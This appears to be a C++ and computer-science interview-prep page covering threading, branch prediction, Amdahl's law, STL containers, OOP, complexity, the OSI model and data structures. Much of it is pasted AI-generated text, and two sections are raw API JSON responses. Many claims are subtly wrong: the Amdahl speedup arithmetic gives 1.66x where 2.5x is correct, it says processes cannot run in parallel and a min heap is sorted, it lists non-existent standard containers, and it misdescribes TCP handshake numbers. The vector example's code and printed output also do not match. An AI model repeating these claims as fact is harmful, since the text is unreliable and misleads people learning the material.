Semaphore, on the other hand, uses a counter to keep track of the number of threads accessing the resource. It uses wait and signal operations to acquire and release the semaphore. Wait operation decreases the counter and if it reaches 0, the thread is put on hold until the semaphore is signaled and the counter is increased.

  1. Usage: Mutex is commonly used in situations where only one thread should access a resource at a time, such as critical sections, shared data structures, and resources with limited access.

Semaphore is used in scenarios where a limited number of threads should have access to a resource, such as a pool of resources or a producer-consumer problem.

  1. Ownership: Mutex has a concept of ownership, which means that the thread that acquired the lock is responsible for releasing it. This is useful in preventing deadlocks where a thread forgets to release the lock.

Semaphore does not have the concept of ownership and any thread can release the semaphore, making it more prone to deadlocks.

  1. Performance: Mutex has a lower overhead compared to semaphore due to its simple implementation. This makes it more efficient in situations where only one thread needs access to a resource at a time.

Semaphore has a slightly higher overhead due to its counter and wait/signal operations. However, it is more suitable for scenarios where a fixed number of threads need to access a resource simultaneously.

In conclusion, mutex and semaphore serve different purposes and have different implementations. They are both important synchronization mechanisms that help ensure thread safety and prevent data corruption in multi-threaded environments.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both mechanisms used in computer operating systems to execute multiple tasks concurrently. They are both important for multitasking and improving the efficiency of a system, but they differ in their implementation and purpose.

  1. Definition Threads are lightweight units of execution within a process. They share the same memory space and resources as their parent process, but each thread has its own stack. Processes, on the other hand, are independent instances of a program that are managed by the operating system. They have their own memory space and resources, and are isolated from other processes.

  2. Creation Threads are typically created within a process by the operating system or by the parent process itself. This allows for multiple threads to share the same resources and communicate with each other easily. Processes, on the other hand, are created by the operating system when a program is launched. Each process has its own resources and is completely independent from other processes.

  3. Resource sharing Threads can share resources such as memory, files, and I/O devices with other threads within the same process. This makes them more efficient and faster than processes, as there is no need for context switching or inter-process communication. Processes, however, do not share resources and must use inter-process communication mechanisms such as pipes or sockets to communicate with each other.

  4. Context switching Context switching is the process of switching from one thread or process to another. In threads, context switching is faster and less expensive as it involves switching between different execution contexts within the same process. In processes, context switching is more expensive as it involves switching between different processes, which have their own memory space and resources.

  5. Scheduling Threads are scheduled by the operating system scheduler, which allocates CPU time to each thread within a process. This allows for efficient use of CPU resources and better performance. Processes are scheduled by the operating system as well, but each process is treated as a separate entity and its scheduling is not affected by other processes.

  6. Communication Threads within the same process can easily communicate with each other through shared memory and variables. They can also communicate by using synchronization mechanisms such as locks or semaphores. Processes, on the other hand, must use inter-process communication mechanisms to communicate with each other.

  7. Parallelism Threads within a process can run in parallel on multiple CPU cores, making them efficient for parallel processing. Processes, however, cannot run in parallel as they are isolated from each other and cannot share resources.

In conclusion, threads and processes are both important for multitasking and improving the efficiency of a system, but they differ in their implementation and purpose. Threads are used for lightweight and efficient multitasking within a process, while processes are used for isolation and communication between different programs.

Thread bests practice

References


Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine destroy the future and the exception is rethrown by the calling get() routine. You ought to pass it a strategy: std::launch::async or std::launch::deferred as a first parameter.

std::thread

You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more. You can use std::scoped_lock with multiple resources or single, but also I think it expresses intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream>
#include <queue>
#include <thread>
#include <mutex>
#include <condition_variable>

using namespace std;

queue<int> buffer; // shared buffer
mutex mtx; // mutex for locking buffer
condition_variable cv; // conditional variable for synchronization

const int BUFFER_SIZE = 10; // buffer size
const int MAX_VALUE = 100; // maximum value for producer to produce
const int NUM_PRODUCERS = 3; // number of producers
const int NUM_CONSUMERS = 2; // number of consumers

// function for producer to produce values and add to buffer
void producer(int id) {
    while (true) {
        // generate random value
        int value = rand() % MAX_VALUE + 1;
        // lock buffer
        unique_lock<mutex> lck(mtx);
        // wait if buffer is full
        cv.wait(lck, [](){return buffer.size() < BUFFER_SIZE;});
        // add value to buffer
        buffer.push(value);
        // print message
        cout << \"Producer \" << id << \" produced value \" << value << endl;
        // notify waiting consumer
        cv.notify_one();
        // unlock buffer
        lck.unlock();
        // sleep for random time
        this_thread::sleep_for(chrono::milliseconds(rand() % 1000 + 1000));
    }
}

// function for consumer to consume values from buffer
void consumer(int id) {
    while (true) {
        // lock buffer
        unique_lock<mutex> lck(mtx);
        // wait if buffer is empty
        cv.wait(lck, [](){return buffer.size() > 0;});
        // get value from buffer
        int value = buffer.front();
        // remove value from buffer
        buffer.pop();
        // print message
        cout << \"Consumer \" << id << \" consumed value \" << value << endl;
        // notify waiting producer
        cv.notify_one();
        // unlock buffer
        lck.unlock();
        // sleep for random time
        this_thread::sleep_for(chrono::milliseconds(rand() % 1000 + 1000));
    }
}

int main() {
    // create producer threads
    thread producers[NUM_PRODUCERS];
    for (int i = 0; i < NUM_PRODUCERS; i++) {
        producers[i] = thread(producer, i);
    }
    // create consumer threads
    thread consumers[NUM_CONSUMERS];
    for (int i = 0; i < NUM_CONSUMERS; i++) {
        consumers[i] = thread(consumer, i);
    }
    // join producer threads
    for (int i = 0; i < NUM_PRODUCERS; i++) {
        producers[i].join();
    }
    // join consumer threads
    for (int i = 0; i < NUM_CONSUMERS; i++) {
        consumers[i].join();
    }
    return 0;
}

Branching

Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;
}

Branch prediction

In summary, branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: Branch prediction is a technique used in computer processors to improve the performance of branch instructions. Branch instructions are instructions that cause the processor to change the sequence of instructions being executed, such as conditional statements or loops.

Branch prediction works by attempting to predict the outcome of a branch instruction before it is actually executed. This prediction is based on past patterns and behavior of the program’s code. If the prediction is correct, the processor can continue executing instructions without having to wait for the branch instruction to be completed. However, if the prediction is incorrect, the processor must undo any changes made and execute the correct instructions.

There are several types of branch prediction techniques, including static and dynamic prediction. Static prediction uses simple rules or heuristics to make predictions, while dynamic prediction uses more advanced algorithms and techniques to make predictions based on past behavior. Dynamic prediction can also adapt to changes in the program’s behavior, making it more accurate than static prediction.

One of the main benefits of branch prediction is that it can significantly reduce the number of pipeline stalls in a processor. Pipeline stalls occur when the processor has to wait for a branch instruction to be completed before it can continue executing other instructions. By predicting the outcome of branch instructions, branch prediction can reduce the number of stalls and improve the overall performance of the processor.

However, branch prediction can also have drawbacks. If the prediction is incorrect, the processor must undo any changes made and execute the correct instructions, which can result in a performance decrease. Additionally, predicting the outcome of some branch instructions can be difficult, especially in complex programs with unpredictable behavior.

Overall, branch prediction is an important technique used in modern processors to improve performance by reducing pipeline stalls. It is constantly being researched and improved upon to make predictions more accurate and efficient.

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.

References


Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law is a principle in computer architecture and performance engineering that states that the overall performance improvement of a system is limited by the speed of its non-parallelizable components. Developed by computer scientist Gene Amdahl in the 1960s, it is used to analyze the potential speedup of a system or program when adding additional resources, such as processors or cores.

The law states that the theoretical maximum speedup of a system is limited by the portion of the program that cannot be parallelized. This is also known as the "serial fraction" or "sequential fraction" of the program. In other words, if a program cannot be broken down into smaller, independent tasks that can be executed simultaneously, then the overall speed of the program will not be significantly improved by adding more processors or cores.

Mathematically, Amdahl’s law can be expressed as:

Speedup = 1 / [(1 - P) + (P / N)]

Where P is the proportion of the program that can be parallelized and N is the number of processors or cores.

For example, if 80% of a program can be parallelized and 4 processors are added, the theoretical maximum speedup would be:

Speedup = 1 / [(1 - 0.8) + (0.8 / 4)] = 1 / 0.6 = 1.66x

This means that even with 4 processors, the program can only be sped up by a maximum of 1.66 times. The remaining 20% of the program that cannot be parallelized will continue to limit the overall performance.

Amdahl’s law highlights the importance of efficient parallelization in computer systems. It also emphasizes the diminishing returns of adding more processors or cores as the non-parallelizable portion of a program becomes a larger factor. This law has been used to guide the design of multi-core processors and parallel computing systems to ensure that the benefits of parallelization are maximized.

It’s very tempting to optimise the parts your are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.


The C++ Standard Library containers

  1. Efficient and Robust Implementation: The C++ Standard Library containers are implemented by experienced developers and have gone through extensive testing and optimization. This ensures a robust and efficient implementation of data structures, making them reliable and performant.

  2. Portability: The C++ Standard Library is a cross-platform library, meaning that containers and algorithms written using it will work on any platform that supports C++. This makes them highly portable and useful for developing cross-platform applications.

  3. Wide Range of Containers: The C++ Standard Library provides a wide range of containers, including vector, list, map, set, deque, etc. These containers are suitable for various data storage and retrieval needs, allowing developers to choose the most efficient one for their use case.

  4. Uniform Interface: All containers in the C++ Standard Library have a uniform interface, making it easy to learn and use them. This uniformity also allows for easier interchangeability of containers in different parts of a program.

  5. Memory Management: The C++ Standard Library containers provide memory management capabilities, such as automatic memory allocation and deallocation, making it easier for developers to manage memory and avoid memory leaks.

  6. Standardized Algorithms: The C++ Standard Library also provides a set of algorithms that can be used with its containers, such as sorting, searching, and manipulating data. These algorithms are highly optimized and can be used with any container, making them highly versatile.

  7. High-level Abstractions: The C++ Standard Library containers provide high-level abstractions, making it easier for developers to focus on the logic of their program rather than the low-level details of data structures.

  8. Community Support: The C++ Standard Library is widely used and has a large community of developers who contribute to its development and provide support to other developers. This makes it easier for developers to find resources and solutions to their problems when using the C++ Standard Library containers.

  9. vector

  10. list

  11. forward_list

  12. deque

  13. array

  14. map

  15. multimap

  16. set

  17. multiset

  18. unordered_map

  19. unordered_multimap

  20. unordered_set

  21. unordered_multiset

  22. stack

  23. queue

  24. priority_queue

  25. bitset

  26. valarray

  27. string

  28. wstring

  29. string_view

  30. span

  31. array_view

  32. vector_bool

  33. map_view

  34. set_view

  35. priority_queue_view

  36. stack_view

  37. queue_view

  38. hash_map

  39. hash_multimap

  40. hash_set

  41. hash_multiset

  42. flat_map

  43. flat_multimap

  44. flat_set

  45. flat_multiset

Categories of containers

Sequence containers in C++ are data structures that store elements in a linear sequence or ordered manner. Examples of sequence containers include arrays, vectors, lists, and deques. These containers allow for efficient insertion and deletion of elements at the beginning, end, or middle of the sequence. The elements in a sequence container are accessed using an index or iterator, and the order of elements is maintained.

On the other hand, associative containers in C++ are data structures that store elements in a specific key-value pair. Examples of associative containers include maps, sets, and multi-maps. These containers allow for efficient retrieval of elements based on their associated keys. The elements in an associative container are sorted based on their key values, and the order of insertion is not preserved. These containers use a hashing or tree-based data structure to organize and access elements based on their keys.

In summary, the main difference between sequence and associative containers is the way they store and access elements. Sequence containers maintain the order of elements and allow for efficient insertion and deletion, while associative containers prioritize efficient retrieval based on keys but do not guarantee the order of elements.

Choosing a container


Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that focuses on the use of objects to represent data and functionality. It is based on the concept of objects, which have properties (attributes or data) and methods (procedures or functions) that can interact with each other.

In OOP, objects are created from classes, which act as blueprints for objects. Classes define the properties and methods that all objects of that type will have. This allows for code reusability and modularity, as objects can inherit properties and methods from their parent classes and can also be used as building blocks for more complex programs.

One of the key principles of OOP is encapsulation, which means that the properties and methods of an object are contained within the object and can only be accessed and modified through designated interfaces. This helps to keep the code organized and secure, as it prevents external code from directly accessing or changing the internal workings of an object.

Another important concept in OOP is inheritance, which allows for the creation of subclasses that inherit properties and methods from their parent classes. This allows for more specialized and specific objects to be created, while still maintaining the code reusability and structure of the parent class.

Polymorphism is also a key aspect of OOP, which refers to the ability of objects to take on different forms and behaviors depending on their context. This allows for flexibility and extensibility in code, as objects can be used in different ways without needing to be rewritten or modified.

Overall, OOP provides a powerful and efficient way to organize and manage code by breaking it down into smaller, more manageable objects with their own properties and behaviors. It is widely used in software development and is the foundation of many popular programming languages such as Java, C++, and Python.

Differences between a class and a struct

In C++, the only difference between a class and a struct is the default access level. In a class, members are private by default, while in a struct, members are public by default. Also, the default inheritance access level is different: class uses private inheritance by default, while struct uses public inheritance by default.

Polymorphism

  1. Ad-hoc Polymorphism: This type of polymorphism allows a function or operator to behave differently based on the type of arguments it receives. It can be achieved through overloading or overriding, and it is often used in object-oriented programming.

  2. Parametric Polymorphism: Also known as generic polymorphism, this type allows a function or data type to be written in a way that can handle multiple data types without specifying them explicitly. This is commonly used in functional programming languages.

  3. Subtype Polymorphism: This type of polymorphism is based on inheritance, where a subclass can be used in place of its superclass. This allows objects of different types to be treated uniformly, as long as they share a common superclass.

  4. Coercion Polymorphism: This type of polymorphism involves automatically converting one type of data into another type when needed. This is commonly used in dynamically typed languages.

  5. Overriding Polymorphism: This occurs when a subclass overrides a method or property of its superclass, allowing it to modify or extend the behavior of the inherited method.

  6. Compile-time Polymorphism: Also known as static polymorphism, this type is resolved at compile time and is achieved through function overloading or operator overloading.

  7. Run-time Polymorphism: Also known as dynamic polymorphism, this type is resolved at run-time and is achieved through virtual functions and late binding. This allows objects of different types to respond differently to the same method call based on their actual type at runtime.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address). A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.

RAII

RAII (Resource Acquisition Is Initialization) is a programming pattern used in C++ that ensures proper handling of resources by tying their acquisition to the initialization of an object. It is a form of automatic resource management where the lifetime of a resource is bound to the lifetime of an object.

In RAII, a resource is acquired and initialized in the constructor of an object, and automatically released and deinitialized in the destructor. This guarantees that the resource will be properly managed and released, even in the case of exceptions or unexpected program flow.

This pattern is commonly used for managing dynamically allocated memory, file handles, database connections, and other resources that require explicit acquisition and release. It simplifies resource management and helps avoid common bugs such as memory leaks or resource leaks.

RAII is a key part of C++ programming and is often used in conjunction with smart pointers and the concept of ownership, where the object responsible for acquiring and releasing the resource is the owner of that resource. This allows for a clear and intuitive ownership model, making it easier to reason about resource management in a program.

Overall, RAII promotes good programming practices by automating resource management and reducing the likelihood of errors and bugs related to resource handling.

Overloading

Overload resolution is the process of determining which version of a function or operator should be called when there are multiple versions with the same name but different parameters. There are several strategies that can be used for overload resolution, including:

  1. Exact Match: This is the simplest strategy, where the compiler looks for an exact match between the parameters in the function call and the parameters in the function definition. If there is an exact match, that function is called. If there is no exact match, an error is thrown.

  2. Implicit Conversion: In this strategy, the compiler checks if the parameters in the function call can be implicitly converted to match the parameters in the function definition. This can include converting between different data types or using default values for optional parameters.

  3. Best Fit: This strategy considers all possible conversions and chooses the version of the function that requires the least amount of conversions. This can help prevent unexpected behavior when there are multiple versions of a function that could potentially be called.

  4. Named Arguments: Instead of relying on the order of arguments, this strategy allows for arguments to be specified by name, making it easier to call a specific version of a function that may have multiple optional parameters.

  5. Variadic Functions: This strategy allows for a variable number of arguments to be passed to a function, making it more flexible and able to handle different input scenarios.

  6. Default Arguments: This strategy allows for default values to be specified for one or more parameters in a function. If no value is provided for those parameters in the function call, the default values will be used.

  7. Access Modifiers: Overload resolution can also be affected by the access modifiers of a function. For example, if there are two versions of a function with the same name and parameters, but one is declared as private and the other as public, the private version will not be accessible outside of the class.

Overall, the choice of overload resolution strategy depends on the language and its specific rules and conventions. Some languages may use a combination of these strategies to determine the best overload for a given function call. ___

Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description Example
O(1) Constant time complexity Accessing an element in an array
O(log n) Logarithmic time complexity Binary search
O(n) Linear time complexity Finding the maximum element in an unsorted array
O(n log n) Linearithmic time complexity Sorting algorithms like Merge Sort and Quick Sort
O(n^2) Quadratic time complexity Nested loops
O(n^3) Cubic time complexity Triple nested loops
O(2^n) Exponential time complexity Recursive algorithms
O(n!) Factorial time complexity Permutation algorithms

Comparing two fundamental data structures

The average complexity of linked lists and arrays can vary depending on the specific operation being performed. However, in general, linked lists tend to have a slightly higher average complexity compared to arrays.

The average complexity of an array for basic operations such as accessing an element by index, inserting or deleting an element at the end, and searching for an element is O(1). This means that these operations can be done in constant time, regardless of the size of the array.

On the other hand, the average complexity of a linked list for the same operations is O(n), where n is the number of elements in the list. This is because in a linked list, accessing an element by index, inserting or deleting an element at the end, and searching for an element all require traversing through the list, which takes linear time.

However, the average complexity of a linked list can be better than an array for certain operations. For example, inserting or deleting an element at the beginning of a linked list has an average complexity of O(1), while the same operation in an array has an average complexity of O(n) because all the elements after the insertion or deletion point need to be shifted.

In summary, the average complexity of linked lists and arrays can vary depending on the specific operation, but in general, arrays have a lower average complexity for basic operations, while linked lists can have a better average complexity for certain operations.


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Name Function Protocols Examples
7 Application Provides network services to applications HTTP, SMTP, FTP Web browsers, email clients, FTP clients
6 Presentation Formats and translates data for the application layer SSL, JPEG, MIDI Encryption, compression, file format conversion
5 Session Establishes, manages, and terminates connections between applications NetBIOS, PPTP, NFS Remote desktop, online gaming, file sharing
4 Transport Provides reliable data transfer between hosts TCP, UDP File transfer, web browsing, email
3 Network Routes data between networks using logical addresses IP, ICMP Internet communication, routing
2 Data Link Transmits data between adjacent network nodes Ethernet, Wi-Fi Local area network communication
1 Physical Transmits raw data between devices Ethernet cables, fiber optics Electrical signals, light waves

Three way handshake

The TCP three-way handshake is the process of establishing a connection between two devices over a TCP/IP network. It is used to ensure reliable and error-free communication between the two devices.

The three steps of the TCP handshake are:

Step 1: SYN (Synchronize) The client sends a SYN packet to the server, indicating that it wants to establish a connection. This packet contains a random sequence number (SYN) that is used to initiate the connection.

Step 2: SYN-ACK (Synchronize-Acknowledge) Upon receiving the SYN packet, the server responds with a SYN-ACK packet. This packet contains the same sequence number (SYN) as well as another random sequence number (ACK) to acknowledge the request.

Step 3: ACK (Acknowledgement) Finally, the client sends an ACK packet to the server, which completes the three-way handshake. This packet contains the ACK sequence number, confirming that it has received the SYN-ACK packet.

After the three-way handshake is completed, the TCP connection is established, and both devices can begin sending data packets to each other. This process is repeated every time a new TCP connection is established between two devices. It also allows for the synchronization of sequence numbers between the two devices, ensuring that data is transmitted in the correct order and without errors.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

What are the most difficult concepts in computer science?


Data structures

It’s important to know the common data structures and their characteristics.

{ “id”: “cmpl-B0z0eZwEE5HqSnx42lVmkuoKMtFSU”, “object”: “completion”, “created”: 1739574220, “model”: “gpt-3.5-turbo-instruct:20230824-v2”, “choices”: [ { “index”: 0, “text”: ” and algorithms

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Graphs
  7. Hash Tables
  8. Sorting Algorithms (e.g. Bubble Sort, Quick Sort, Merge Sort)
  9. Searching Algorithms (e.g. Linear Search, Binary Search)
  10. Recursion
  11. Dynamic Programming
  12. Greedy Algorithms
  13. Depth-First Search (DFS)
  14. Breadth-First Search (BFS)
  15. Dijkstra’s Algorithm
  16. Prim’s Algorithm
  17. Kruskal’s Algorithm
  18. Bellman-Ford Algorithm
  19. Floyd-Warshall Algorithm
  20. Binary Search Trees
  21. AVL Trees
  22. Red-Black Trees
  23. Heap Data Structure
  24. Priority Queues
  25. Trie Data Structure
  26. Bloom Filters
  27. Disjoint Set Data Structure
  28. Hashing Techniques (e.g. Open Addressing, Chaining)
  29. Bit Manipulation
  30. Big O Notation and Time Complexity Analysis. “,”finish_reason”: “stop” } ], “usage”: { “prompt_tokens”: 9, “completion_tokens”: 224, “total_tokens”: 233, “prompt_tokens_details”: { “cached_tokens”: 0, “audio_tokens”: 0 }, “completion_tokens_details”: { “reasoning_tokens”: 0, “audio_tokens”: 0, “accepted_prediction_tokens”: 0, “rejected_prediction_tokens”: 0 } } }

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all of the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead; also, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

A binary search tree is a data structure that is used to store and organize data in a hierarchical manner. It consists of nodes, each of which has a value and two child nodes - a left child node and a right child node. The root node is the topmost node in the tree.

The binary search tree follows a specific rule for storing the data - all values in the left subtree of a node must be less than the value of the node, and all values in the right subtree must be greater than the value of the node. This allows for efficient searching and sorting of data in the tree.

Binary search trees have several important properties, including:

  1. The left subtree of a node contains only values that are less than the value of the node.
  2. The right subtree of a node contains only values that are greater than the value of the node.
  3. The left and right subtrees of a node must also be binary search trees.
  4. There are no duplicate values in the tree.

Some common operations that can be performed on binary search trees include:

  1. Inserting a new node - the new node is inserted in the correct position according to the binary search tree rule.
  2. Searching for a specific value - the tree is traversed starting from the root node, comparing the value with each node until the value is found or the end of the tree is reached.
  3. Deleting a node - the node to be deleted is replaced with its successor or predecessor (based on specific rules), and the tree is rearranged to maintain the binary search tree properties.
  4. Traversing the tree - there are three common ways to traverse a binary search tree: in-order (left subtree, root, right subtree), pre-order (root, left subtree, right subtree), and post-order (left subtree, right subtree, root).

Binary search trees have an average time complexity of O(log n) for search, insert, and delete operations, making them efficient for storing and retrieving data. However, if the tree is not balanced (i.e. there is a significant difference in the number of nodes on the left and right subtrees), the time complexity can increase to O(n), making operations less efficient.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.

123456789abcedef
1
23
4567
89abcdef

Project down, the top of the tree is a smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is based on a complete binary tree, where the parent node is either larger or smaller than its child nodes. It is commonly used to implement priority queues, where the highest priority element is always at the root. A heap does not necessarily have a specific ordering of its elements, as long as the parent-child relationship is maintained.

On the other hand, a binary search tree (BST) is a binary tree where the left child of a node is always smaller and the right child is always larger than the parent node. This ordering property makes it efficient for searching, inserting, and deleting elements. BSTs are commonly used to implement binary search algorithms.

In summary, the main differences between a heap and a binary search tree are:

  1. Ordering: A heap does not have a specific ordering of its elements, while a binary search tree follows a specific ordering.

  2. Structure: A heap is a complete binary tree, while a binary search tree can have different structures depending on the order of insertion.

  3. Usage: A heap is commonly used to implement priority queues, while a binary search tree is commonly used for searching, inserting, and deleting elements.

  4. Performance: A heap has faster insertion and deletion times compared to a binary search tree, but a binary search tree has faster search times.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

{ “id”: “cmpl-B0z0tSjt0pdEKoJBmp3jqbTkPko8I”, “object”: “completion”, “created”: 1739574235, “model”: “gpt-3.5-turbo-instruct:20230824-v2”, “choices”: [ { “index”: 0, “text”: ”

Container Average Case Time Complexity Worst Case Time Complexity Space Complexity
Vector O(1) O(n) O(n)
Deque O(1) O(n) O(n)
List O(1) O(n) O(n)
Forward List O(1) O(n) O(n)
Array O(1) O(1) O(n)
Set O(log n) O(n) O(n)
Unordered Set O(1) O(n) O(n)
Map O(log n) O(n) O(n)
Unordered Map O(1) O(n) O(n)
Stack O(1) O(n) O(n)
Queue O(1) O(n) O(n)
Priority Queue O(log n) O(n) O(n)
  "finish_reason": "stop"
}

], “usage”: { “prompt_tokens”: 12, “completion_tokens”: 275, “total_tokens”: 287, “prompt_tokens_details”: { “cached_tokens”: 0, “audio_tokens”: 0 }, “completion_tokens_details”: { “reasoning_tokens”: 0, “audio_tokens”: 0, “accepted_prediction_tokens”: 0, “rejected_prediction_tokens”: 0 } } }

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.


Virtual memory

OpenAI: 1. Increased Memory Capacity: Virtual memory allows computers to use more memory than physically available. This is because it uses a portion of the hard drive as virtual memory, which acts as an extension of the physical memory. This allows computers to run larger programs and processes that would otherwise be limited by the amount of physical memory available.

  1. Improved Performance: Virtual memory can improve overall system performance by allowing multiple programs to run at the same time without causing the system to crash or slow down. This is because virtual memory allows the computer to allocate memory resources efficiently and prioritize which programs get access to physical memory.

  2. Cost Savings: Virtual memory reduces the need for expensive physical memory upgrades. Instead of purchasing additional physical memory, virtual memory uses the existing hard drive space to act as virtual memory. This can save money for both consumers and businesses.

